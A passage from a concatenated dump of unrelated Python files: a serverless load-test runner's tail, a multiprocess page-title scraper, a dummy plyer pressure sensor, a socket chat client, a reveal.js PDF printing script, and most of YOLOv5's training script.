                func_invoc_dict[q.function_name] = 0
            func_invoc_dict[q.function_name] += num_invoc
            # One process per invocation so requests fire concurrently.
            processes = [Process(target=queryFunction,
                                 args=(q.function_name, q.endpoint, q.execution_time,
                                       q.object_size, q.memory, func_measurement_dict))
                         for x in range(num_invoc)]
            for p in processes:
                p.start()
            for p in processes:
                p.join()
    # Tell the daemon to exit (the lambda closure observes this rebinding).
    stop_flag = True
    daemon.join()
    return func_measurement_dict, daemon_measurement_dict, func_invoc_dict
def main(args):
    """Run either a trace-driven experiment or a single manual query."""
    tracedir = args.tracedir
    min_range = args.minrange
    max_range = args.maxrange
    num_sec = args.numsec
    sort_traces = args.sorttraces
    if tracedir is not None:
        # Trace-driven mode: map traces onto the deployed endpoints.
        endpoints = readEndpoints()
        trace_manager = TraceManager(endpoints, tracedir, filter_days, sort_traces)
        queries_to_run = trace_manager.generateQueries(min_range, max_range)
        function_dict, daemon_dict, invoc_dict = runExperiment(queries_to_run, num_sec)
        trace_manager.analyzeResults(function_dict, daemon_dict, invoc_dict)
    else:
        # Manual mode: issue a single query against the endpoint.
        endpoint = args.endpoint
        executiontime = args.executiontime
        objectsize = args.objectsize
        memoryallocate = args.memoryallocate
        # BUG FIX: queryFunction() takes a function name first and a results
        # dict last; the original call omitted both and raised a TypeError.
        results = {'manual': []}
        queryFunction('manual', endpoint, executiontime, objectsize,
                      memoryallocate, results)
        print('Latency (ms): {}'.format(results['manual']))
if __name__ == '__main__':
    # Parse CLI arguments and run the experiment.
    main(getArgs())
|
distributedGetTitle.py
|
import time
import re
import requests
from lxml import etree
from multiprocessing import Process
from dbmongo import DBMongo
from dbredis import RedisDB
def get_response(url):
    """Fetch *url* and return the text of its <title> element.

    Raises on network errors, undecodable bodies, or a missing <title>;
    the caller treats any exception as a failed URL.

    BUG FIX: pick_charset() returns None when the page declares no meta
    charset, and bytes.decode(None) raises TypeError — fall back to utf-8.
    """
    ret = requests.get(url, timeout=10)
    site_encode = pick_charset(ret.text) or 'utf-8'
    ret = ret.content.decode(site_encode)
    html = etree.HTML(ret)
    title = html.xpath('//title/text()')
    return title[0]
def pick_charset(html):
    """Extract the charset declared in an HTML document's meta tag.

    :param html: page source text
    :return: lower-cased charset name, or None when none is declared
    """
    pattern = re.compile(
        '<meta .*(http-equiv="?Content-Type"?.*)?charset="?([a-zA-Z0-9_-]+)"?',
        re.I)
    match = pattern.search(html)
    if match and match.lastindex == 2:
        return match.group(2).lower()
    return None
def run():
    """Worker loop: pull URLs from redis until exhausted, store titles in mongo.

    Successful fetches are written to the 'has' collection; any failure
    (network error, decode error, missing title) records the url in 'loss'.
    """
    mdb = DBMongo()
    rdb = RedisDB()
    while True:
        url = rdb.fetch_one_element()
        if url is None:
            # Queue drained: this worker is done.
            break
        try:
            title = get_response(url)
            item = dict()
            # NOTE(review): strip("'http://") strips any of the characters
            # ' h t p : / from BOTH ends, not the literal prefix — confirm
            # this is the intended normalization.
            item['result'] = "{}\t{}".format(url.strip("'http://"), title.strip())
            mdb.insert_2_xt(item, 'has')
        except Exception as e:
            item = dict()
            item['url'] = url
            mdb.insert_2_xt(item, 'loss')
if __name__ == '__main__':
    # Spawn 30 worker processes, staggered one second apart to ramp up load.
    for i in range(30):
        p = Process(target=run)
        p.start()
        time.sleep(1)
    print('执行主进程的内容了')
|
pressure.py
|
'''
'Windows' pressure sensor
---------------------
A dummy pressure sensor for phone emulation
'''
from plyer.facades import Pressure
from sensor_simulate import SemiRandomData
# from multiprocessing import Process, Manager
from threading import Thread
import time
import sys
class PressureSensorListener(object):
    """Polls a simulated pressure sensor on a background thread."""

    def __init__(self):
        """Set up the dummy sensor with empty readings and polling disabled."""
        self.sensor = 'DummySensorObj'
        self.values = [None, None, None]  # latest (a, b, c) sample
        self.state = False  # True while the polling thread should run

    def enable(self):
        """Start the background polling thread."""
        self.state = True
        self.process_get_data = Thread(target=self.get_data)
        self.process_get_data.start()

    def disable(self):
        """Ask the polling thread to stop."""
        self.state = False

    def get_data(self):
        """Thread body: refresh self.values every 10 ms until disabled."""
        generator = SemiRandomData(3, 3, 1000, .05)
        while self.state is True:
            a, b, c = generator.get_value()
            self.values[0] = a
            self.values[1] = b
            self.values[2] = c
            time.sleep(.01)

    def monitor(self, time_length=10, frequency=1):
        """Print the current values every *frequency* s, *time_length* times."""
        for _ in range(time_length):
            time.sleep(frequency)
            sys.stdout.write(str(self.values) + '\n')
            sys.stdout.flush()
class WinPressure(Pressure):
    """'Windows' pressure facade backed by the dummy sensor listener."""

    def __init__(self):
        super(WinPressure, self).__init__()
        self.bState = False  # True while the listener thread is running

    def _enable(self):
        # Idempotent: a second enable while running is a no-op.
        if (not self.bState):
            self.listener = PressureSensorListener()
            self.listener.enable()
            self.bState = True

    def _disable(self):
        # Idempotent: disabling while stopped is a no-op.
        if (self.bState):
            self.bState = False
            self.listener.disable()
            del self.listener

    def _get_pressure(self):
        # Returns (None, None, None) while the sensor is disabled.
        if (self.bState):
            return tuple(self.listener.values)
        else:
            return (None, None, None)

    def __del__(self):
        if(self.bState):
            self._disable()
        # NOTE(review): assumes the base class defines __del__; if Pressure
        # does not, this raises AttributeError during finalization — confirm.
        # super(self.__class__, ...) is also fragile under subclassing.
        super(self.__class__, self).__del__()
def instance():
    """Factory used by plyer to obtain the platform implementation."""
    return WinPressure()
|
client.py
|
import socket
import threading
import random
def send_message():
    """Read lines from stdin and send them to the chat server.

    Uses the module-level *sock* and *name*. Typing backslash-"leave chat"
    closes the socket and ends the loop.
    """
    try:
        while True:
            msg = input()
            sock.send(bytes(name + ": " + msg, 'utf-8'))
            # NOTE(review): the line is sent before the leave check, so the
            # server still receives the leave command itself.
            if msg == '\leave chat':
                sock.close()
                break
    except Exception:
        # Socket errors (e.g. server gone) simply end the loop.
        pass
    finally:
        print('You left chat.')
def receive_message():
    """Print every message from the server until the connection closes."""
    try:
        while True:
            data = sock.recv(1024).decode('utf-8')
            if not data:
                # Empty read: the peer closed the connection.
                break
            print(data)
        sock.close()
    except Exception:
        # Socket already closed by the sender thread, or network error.
        pass
# Connect to the local chat server, pick a random guest name, and start
# the sender and receiver loops on separate threads.
sock = socket.socket()
sock.connect(('localhost', 9090))
number = random.randint(0,1000)
name = "person" + str(number)
threading.Thread(target=send_message).start()
threading.Thread(target=receive_message).start()
|
printreveal_v2.py
|
#!/usr/bin/env python
# NOTE: This script requires a copy of decktape.js properly set up in the
# decktape-2.9.3 folder, along with ghostscript AND node.js WITH chalk
# installed. It uses puppeteer (chrome) to print, at a higher resolution
# than printreveal.py.
import sys
import subprocess
import argparse
import os
import posixpath

if sys.version_info[0] < 3:
    import urllib
else:
    import urllib.parse as urllib

# Directory containing this script (the decktape bundles live next to it).
cwd = os.path.dirname(os.path.abspath(__file__))
print(cwd)

# Command-line interface.
args = argparse.ArgumentParser(description="Reveal.js parser")
args.add_argument('-f', '--file', dest='slidehtml', default='NA',
                  help='Location of html file to print')
args.add_argument('-c', '--compress', dest='compress', default=False, action='store_true')
args.add_argument('-n', '--number', dest='number', default='NA',
                  help='Number of slides to print')
args = args.parse_args()

slidehtml = os.path.abspath(args.slidehtml)
if '.html' not in slidehtml:
    print('Please pass a valid reveal.js html file')
    exit()

# Serve the presentation straight from disk: file:// URL three levels up.
http_directory = 'file://' + '/'.join(slidehtml.split('/')[:-3])
print(slidehtml)
print(http_directory)

# Pick the platform-specific decktape bundle and build the relative URL.
if sys.platform == "win32":
    relativehtml = http_directory + '/' + '/'.join(slidehtml.split('\\')[-3:])
    os.chdir(cwd + '/decktape-2.9.3-windows/')  # sets the directory for print libraries
else:
    relativehtml = http_directory + '/' + '/'.join(slidehtml.split('/')[-3:])
    os.chdir(cwd + '/decktape-2.9.3-linux/')  # sets the directory for print libraries

slidepdf = slidehtml[:-4] + 'pdf'
compressedpdf = slidepdf[:-4] + '-compress.pdf'
print('Printing from: ' + relativehtml)
print('Printing to: ' + slidepdf)

# Optional slide-range argument for decktape; silently ignored when invalid.
if args.number != 'NA':
    try:
        number = ' --slides 1-' + str(int(args.number)) + ' '
    except (TypeError, ValueError):
        number = ''
else:
    number = ''

# Print slides in full resolution.
return_code = subprocess.call("node decktape.js " + number + "-s 1536x1152 reveal " + relativehtml + ' \"' + slidepdf + "\"", shell=True)

# Optionally shrink the PDF with ghostscript's ebook profile.
if args.compress:
    print('Compressing pdf')
    if sys.platform == "win32":
        return_code = subprocess.call("gswin64c -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -dPrinted=false -sOutputFile=\"" + compressedpdf + "\" \"" + slidepdf + "\"", shell=True)
    else:
        return_code = subprocess.call("ghostscript -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -dPrinted=false -sOutputFile=\"" + compressedpdf + "\" \"" + slidepdf + "\"", shell=True)
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from pathlib import Path
from threading import Thread
from warnings import warn
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle
from utils.google_utils import attempt_download
from utils.loss import compute_loss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first
logger = logging.getLogger(__name__)
try:
import wandb
except ImportError:
wandb = None
logger.info("Install Weights & Biases for experiment logging via 'pip install wandb' (recommended)")
def train(hyp, opt, device, tb_writer=None, wandb=None):
    """Run a full YOLOv5 training loop and return the final metrics.

    Parameters
    ----------
    hyp : dict
        Hyperparameters (learning rates, loss gains, warmup and
        augmentation settings). Mutated in place (scaled to nc/img size).
    opt : argparse.Namespace
        Parsed command-line options (paths, epochs, batch sizes, DDP ranks).
    device : torch.device
        Target device from select_device().
    tb_writer : SummaryWriter or None
        Tensorboard writer; only used on rank -1/0.
    wandb : module or None
        The wandb module if installed, else None.

    Returns
    -------
    tuple
        Last evaluation results: (P, R, mAP@.5, mAP@.5:.95, val_box,
        val_obj, val_cls).
    """
    logger.info(f'Hyperparameters {hyp}')
    save_dir, epochs, batch_size, total_batch_size, weights, rank = \
        Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
    # Directories
    wdir = save_dir / 'weights'
    wdir.mkdir(parents=True, exist_ok=True)  # make dir
    last = wdir / 'last.pt'
    best = wdir / 'best.pt'
    results_file = save_dir / 'results.txt'
    # Save run settings so the run can be resumed/reproduced later
    with open(save_dir / 'hyp.yaml', 'w') as f:
        yaml.dump(hyp, f, sort_keys=False)
    with open(save_dir / 'opt.yaml', 'w') as f:
        yaml.dump(vars(opt), f, sort_keys=False)
    # Configure
    plots = not opt.evolve  # create plots
    cuda = device.type != 'cpu'
    init_seeds(2 + rank)  # rank-dependent seed so DDP workers differ
    with open(opt.data) as f:
        data_dict = yaml.load(f, Loader=yaml.FullLoader)  # data dict
    with torch_distributed_zero_first(rank):
        check_dataset(data_dict)  # check
    train_path = data_dict['train']
    test_path = data_dict['val']
    nc = 1 if opt.single_cls else int(data_dict['nc'])  # number of classes
    names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names']  # class names
    assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data)  # check
    # Model
    pretrained = weights.endswith('.pt')
    if pretrained:
        with torch_distributed_zero_first(rank):
            attempt_download(weights)  # download if not found locally
        ckpt = torch.load(weights, map_location=device)  # load checkpoint
        if hyp.get('anchors'):
            ckpt['model'].yaml['anchors'] = round(hyp['anchors'])  # force autoanchor
        model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc).to(device)  # create
        exclude = ['anchor'] if opt.cfg or hyp.get('anchors') else []  # exclude keys
        state_dict = ckpt['model'].float().state_dict()  # to FP32
        state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude)  # intersect
        model.load_state_dict(state_dict, strict=False)  # load
        logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights))  # report
    else:
        model = Model(opt.cfg, ch=3, nc=nc).to(device)  # create
    # Freeze
    freeze = []  # parameter names to freeze (full or partial)
    for k, v in model.named_parameters():
        v.requires_grad = True  # train all layers
        if any(x in k for x in freeze):
            print('freezing %s' % k)
            v.requires_grad = False
    # Optimizer
    nbs = 64  # nominal batch size
    accumulate = max(round(nbs / total_batch_size), 1)  # accumulate loss before optimizing
    hyp['weight_decay'] *= total_batch_size * accumulate / nbs  # scale weight_decay
    logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
    # Three parameter groups: BN weights (no decay), conv weights (decay), biases
    pg0, pg1, pg2 = [], [], []  # optimizer parameter groups
    for k, v in model.named_modules():
        if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
            pg2.append(v.bias)  # biases
        if isinstance(v, nn.BatchNorm2d):
            pg0.append(v.weight)  # no decay
        elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
            pg1.append(v.weight)  # apply decay
    if opt.adam:
        optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999))  # adjust beta1 to momentum
    else:
        optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
    optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']})  # add pg1 with weight_decay
    optimizer.add_param_group({'params': pg2})  # add pg2 (biases)
    logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
    del pg0, pg1, pg2
    # Scheduler https://arxiv.org/pdf/1812.01187.pdf
    # https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
    lf = one_cycle(1, hyp['lrf'], epochs)  # cosine 1->hyp['lrf']
    scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
    # plot_lr_scheduler(optimizer, scheduler, epochs)
    # Logging
    if rank in [-1, 0] and wandb and wandb.run is None:
        opt.hyp = hyp  # add hyperparameters
        wandb_run = wandb.init(config=opt, resume="allow",
                               project='YOLOv5' if opt.project == 'runs/train' else Path(opt.project).stem,
                               name=save_dir.stem,
                               id=ckpt.get('wandb_id') if 'ckpt' in locals() else None)
    loggers = {'wandb': wandb}  # loggers dict
    # Resume
    start_epoch, best_fitness = 0, 0.0
    if pretrained:
        # Optimizer
        if ckpt['optimizer'] is not None:
            optimizer.load_state_dict(ckpt['optimizer'])
            best_fitness = ckpt['best_fitness']
        # Results
        if ckpt.get('training_results') is not None:
            with open(results_file, 'w') as file:
                file.write(ckpt['training_results'])  # write results.txt
        # Epochs
        start_epoch = ckpt['epoch'] + 1
        if opt.resume:
            assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
        if epochs < start_epoch:
            logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
                        (weights, ckpt['epoch'], epochs))
            epochs += ckpt['epoch']  # finetune additional epochs
        del ckpt, state_dict
    # Image sizes
    gs = int(model.stride.max())  # grid size (max stride)
    nl = model.model[-1].nl  # number of detection layers (used for scaling hyp['obj'])
    imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size]  # verify imgsz are gs-multiples
    # DP mode
    if cuda and rank == -1 and torch.cuda.device_count() > 1:
        model = torch.nn.DataParallel(model)
    # SyncBatchNorm
    if opt.sync_bn and cuda and rank != -1:
        model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
        logger.info('Using SyncBatchNorm()')
    # EMA
    ema = ModelEMA(model) if rank in [-1, 0] else None
    # DDP mode
    if cuda and rank != -1:
        model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)
    # Trainloader
    dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
                                            hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
                                            world_size=opt.world_size, workers=opt.workers,
                                            image_weights=opt.image_weights, quad=opt.quad)
    mlc = np.concatenate(dataset.labels, 0)[:, 0].max()  # max label class
    nb = len(dataloader)  # number of batches
    assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
    # Process 0
    if rank in [-1, 0]:
        ema.updates = start_epoch * nb // accumulate  # set EMA updates
        testloader = create_dataloader(test_path, imgsz_test, total_batch_size, gs, opt,  # testloader
                                       hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True,
                                       rank=-1, world_size=opt.world_size, workers=opt.workers, pad=0.5)[0]
        if not opt.resume:
            labels = np.concatenate(dataset.labels, 0)
            c = torch.tensor(labels[:, 0])  # classes
            # cf = torch.bincount(c.long(), minlength=nc) + 1.  # frequency
            # model._initialize_biases(cf.to(device))
            if plots:
                plot_labels(labels, save_dir, loggers)
                if tb_writer:
                    tb_writer.add_histogram('classes', c, 0)
            # Anchors
            if not opt.noautoanchor:
                check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
    # Model parameters
    hyp['cls'] *= nc / 80.  # scale hyp['cls'] to class count
    hyp['obj'] *= imgsz ** 2 / 640. ** 2 * 3. / nl  # scale hyp['obj'] to image size and output layers
    model.nc = nc  # attach number of classes to model
    model.hyp = hyp  # attach hyperparameters to model
    model.gr = 1.0  # iou loss ratio (obj_loss = 1.0 or iou)
    model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc  # attach class weights
    model.names = names
    # Start training
    t0 = time.time()
    nw = max(round(hyp['warmup_epochs'] * nb), 1000)  # number of warmup iterations, max(3 epochs, 1k iterations)
    # nw = min(nw, (epochs - start_epoch) / 2 * nb)  # limit warmup to < 1/2 of training
    maps = np.zeros(nc)  # mAP per class
    results = (0, 0, 0, 0, 0, 0, 0)  # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
    scheduler.last_epoch = start_epoch - 1  # do not move
    scaler = amp.GradScaler(enabled=cuda)
    logger.info('Image sizes %g train, %g test\n'
                'Using %g dataloader workers\nLogging results to %s\n'
                'Starting training for %g epochs...' % (imgsz, imgsz_test, dataloader.num_workers, save_dir, epochs))
    for epoch in range(start_epoch, epochs):  # epoch ------------------------------------------------------------------
        model.train()
        # Update image weights (optional)
        if opt.image_weights:
            # Generate indices
            if rank in [-1, 0]:
                cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc  # class weights
                iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw)  # image weights
                dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n)  # rand weighted idx
            # Broadcast if DDP
            if rank != -1:
                indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
                dist.broadcast(indices, 0)
                if rank != 0:
                    dataset.indices = indices.cpu().numpy()
        # Update mosaic border
        # b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
        # dataset.mosaic_border = [b - imgsz, -b]  # height, width borders
        mloss = torch.zeros(4, device=device)  # mean losses
        if rank != -1:
            dataloader.sampler.set_epoch(epoch)
        pbar = enumerate(dataloader)
        logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'targets', 'img_size'))
        if rank in [-1, 0]:
            pbar = tqdm(pbar, total=nb)  # progress bar
        optimizer.zero_grad()
        for i, (imgs, targets, paths, _) in pbar:  # batch -------------------------------------------------------------
            ni = i + nb * epoch  # number integrated batches (since train start)
            imgs = imgs.to(device, non_blocking=True).float() / 255.0  # uint8 to float32, 0-255 to 0.0-1.0
            # Warmup
            if ni <= nw:
                xi = [0, nw]  # x interp
                # model.gr = np.interp(ni, xi, [0.0, 1.0])  # iou loss ratio (obj_loss = 1.0 or iou)
                accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
                for j, x in enumerate(optimizer.param_groups):
                    # bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
                    x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
                    if 'momentum' in x:
                        x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
            # Multi-scale
            if opt.multi_scale:
                sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs  # size
                sf = sz / max(imgs.shape[2:])  # scale factor
                if sf != 1:
                    ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]]  # new shape (stretched to gs-multiple)
                    imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
            # Forward
            with amp.autocast(enabled=cuda):
                pred = model(imgs)  # forward
                loss, loss_items = compute_loss(pred, targets.to(device), model)  # loss scaled by batch_size
                if rank != -1:
                    loss *= opt.world_size  # gradient averaged between devices in DDP mode
                if opt.quad:
                    loss *= 4.
            # Backward
            scaler.scale(loss).backward()
            # Optimize
            if ni % accumulate == 0:
                scaler.step(optimizer)  # optimizer.step
                scaler.update()
                optimizer.zero_grad()
                if ema:
                    ema.update(model)
            # Print
            if rank in [-1, 0]:
                mloss = (mloss * i + loss_items) / (i + 1)  # update mean losses
                mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0)  # (GB)
                s = ('%10s' * 2 + '%10.4g' * 6) % (
                    '%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
                pbar.set_description(s)
                # Plot
                if plots and ni < 3:
                    f = save_dir / f'train_batch{ni}.jpg'  # filename
                    Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
                    # if tb_writer:
                    #     tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
                    #     tb_writer.add_graph(model, imgs)  # add model to tensorboard
                elif plots and ni == 3 and wandb:
                    wandb.log({"Mosaics": [wandb.Image(str(x), caption=x.name) for x in save_dir.glob('train*.jpg')]})
            # end batch ------------------------------------------------------------------------------------------------
        # end epoch ----------------------------------------------------------------------------------------------------
        # Scheduler
        lr = [x['lr'] for x in optimizer.param_groups]  # for tensorboard
        scheduler.step()
        # DDP process 0 or single-GPU
        if rank in [-1, 0]:
            # mAP
            if ema:
                ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
            final_epoch = epoch + 1 == epochs
            if not opt.notest or final_epoch:  # Calculate mAP
                results, maps, times = test.test(opt.data,
                                                 batch_size=total_batch_size,
                                                 imgsz=imgsz_test,
                                                 model=ema.ema,
                                                 single_cls=opt.single_cls,
                                                 dataloader=testloader,
                                                 save_dir=save_dir,
                                                 plots=plots and final_epoch,
                                                 log_imgs=opt.log_imgs if wandb else 0)
            # Write
            with open(results_file, 'a') as f:
                f.write(s + '%10.4g' * 7 % results + '\n')  # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
            if len(opt.name) and opt.bucket:
                os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
            # Log
            tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss',  # train loss
                    'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
                    'val/box_loss', 'val/obj_loss', 'val/cls_loss',  # val loss
                    'x/lr0', 'x/lr1', 'x/lr2']  # params
            for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
                if tb_writer:
                    tb_writer.add_scalar(tag, x, epoch)  # tensorboard
                if wandb:
                    wandb.log({tag: x})  # W&B
            # Update best mAP
            fi = fitness(np.array(results).reshape(1, -1))  # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
            if fi > best_fitness:
                best_fitness = fi
            # Save model
            save = (not opt.nosave) or (final_epoch and not opt.evolve)
            if save:
                with open(results_file, 'r') as f:  # create checkpoint
                    # NOTE(review): wandb_run is only bound when wandb.run was
                    # None at startup; if an external wandb run already
                    # existed, this line raises NameError — verify upstream.
                    ckpt = {'epoch': epoch,
                            'best_fitness': best_fitness,
                            'training_results': f.read(),
                            'model': ema.ema,
                            'optimizer': None if final_epoch else optimizer.state_dict(),
                            'wandb_id': wandb_run.id if wandb else None}
                # Save last, best and delete
                torch.save(ckpt, last)
                if best_fitness == fi:
                    torch.save(ckpt, best)
                del ckpt
        # end epoch ----------------------------------------------------------------------------------------------------
    # end training
    if rank in [-1, 0]:
        # Strip optimizers
        final = best if best.exists() else last  # final model
        for f in [last, best]:
            if f.exists():
                strip_optimizer(f)  # strip optimizers
        if opt.bucket:
            os.system(f'gsutil cp {final} gs://{opt.bucket}/weights')  # upload
        # Plots
        if plots:
            plot_results(save_dir=save_dir)  # save as results.png
            if wandb:
                files = ['results.png', 'precision_recall_curve.png', 'confusion_matrix.png']
                wandb.log({"Results": [wandb.Image(str(save_dir / f), caption=f) for f in files
                                       if (save_dir / f).exists()]})
                if opt.log_artifacts:
                    wandb.log_artifact(artifact_or_path=str(final), type='model', name=save_dir.stem)
        # Test best.pt
        logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
        if opt.data.endswith('coco.yaml') and nc == 80:  # if COCO
            for conf, iou, save_json in ([0.25, 0.45, False], [0.001, 0.65, True]):  # speed, mAP tests
                results, _, _ = test.test(opt.data,
                                          batch_size=total_batch_size,
                                          imgsz=imgsz_test,
                                          conf_thres=conf,
                                          iou_thres=iou,
                                          model=attempt_load(final, device).half(),
                                          single_cls=opt.single_cls,
                                          dataloader=testloader,
                                          save_dir=save_dir,
                                          save_json=save_json,
                                          plots=False)
    else:
        dist.destroy_process_group()
    wandb.run.finish() if wandb and wandb.run else None
    torch.cuda.empty_cache()
    return results
# Entry point: parse CLI options, set up (optional) DDP, then either run a
# single training job or evolve hyperparameters over many short runs.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
    parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
    parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
    parser.add_argument('--epochs', type=int, default=300)
    parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
    parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
    parser.add_argument('--rect', action='store_true', help='rectangular training')
    parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
    parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
    parser.add_argument('--notest', action='store_true', help='only test final epoch')
    parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
    parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
    parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
    parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
    parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
    parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
    parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
    parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
    parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
    parser.add_argument('--log-imgs', type=int, default=16, help='number of images for W&B logging, max 100')
    parser.add_argument('--log-artifacts', action='store_true', help='log artifacts, i.e. final trained model')
    parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
    parser.add_argument('--project', default='runs/train', help='save to project/name')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--quad', action='store_true', help='quad dataloader')
    opt = parser.parse_args()
    # Set DDP variables (populated by torch.distributed.launch via env vars)
    opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
    opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
    set_logging(opt.global_rank)
    if opt.global_rank in [-1, 0]:
        check_git_status()
        check_requirements()
    # Resume
    if opt.resume:  # resume an interrupted run
        ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run()  # specified or most recent path
        assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
        apriori = opt.global_rank, opt.local_rank
        # Reload the options the interrupted run was started with, but keep
        # the current DDP ranks (apriori) since those depend on this launch.
        with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
            opt = argparse.Namespace(**yaml.load(f, Loader=yaml.FullLoader))  # replace
        opt.cfg, opt.weights, opt.resume, opt.global_rank, opt.local_rank = '', ckpt, True, *apriori  # reinstate
        logger.info('Resuming training from %s' % ckpt)
    else:
        # opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
        opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp)  # check files
        assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
